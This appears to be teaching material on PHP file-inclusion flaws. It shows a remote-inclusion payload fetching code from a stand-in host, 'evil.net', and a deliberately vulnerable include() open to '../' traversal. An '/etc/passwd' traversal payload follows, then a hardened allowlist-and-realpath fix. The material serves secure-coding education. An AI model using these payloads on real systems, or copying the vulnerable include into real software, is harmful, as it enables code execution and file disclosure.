Variable Poisoning :: Chapter 2
[Past Exploits]
./?page=ftp://user:pass@evil.net/arbitrary_code.php
New Code
// php.ini ::
allow_url_fopen = Off

<?php
// Local prefix stops the ftp:// wrapper, but nothing canonicalises the
// user-supplied name, so "../" sequences still escape /path/to/pages/.
$path = '/path/to/pages/';
if (file_exists($path . $_GET['page'])) {
    include $path . $_GET['page'];
}
Attack:
./?page=../../../../../../../etc/passwd
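As an added example that is not part of the original slide, here is a hardened form of the same include: the page name must match an allowlist, the joined path is canonicalised with realpath(), and the result must still sit under the base directory, so neither a remote wrapper nor a ../ sequence reaches include. The names $base, $allowed, resolve_page and the '/path/to/pages' directory are assumptions for illustration.

```php
<?php
// Hardened replacement for the vulnerable include (added example, not the
// original code). Directory and page names below are assumed placeholders.
$base = realpath('/path/to/pages');          // canonical base directory

// Allowlist of page names this application actually serves.
$allowed = ['home', 'about', 'contact'];

function resolve_page(string $base, array $allowed, ?string $page): ?string
{
    // Reject anything that is not an exact, known page name. This alone
    // blocks "../etc/passwd" and "ftp://..." because neither is in the list.
    if ($page === null || !in_array($page, $allowed, true)) {
        return null;
    }

    // Canonicalise after joining so "../" and symlinks are resolved before
    // the path is compared against the base directory.
    $full = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    if ($full === false) {
        return null;                         // file does not exist
    }

    // Defence in depth: the canonical path must start with "$base/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

$target = resolve_page($base, $allowed, $_GET['page'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

On PHP 5.2 and later, include of URL wrappers is governed by the separate allow_url_include setting, which should be Off alongside allow_url_fopen. A log entry for every rejected page value is a cheap traversal-probe detector.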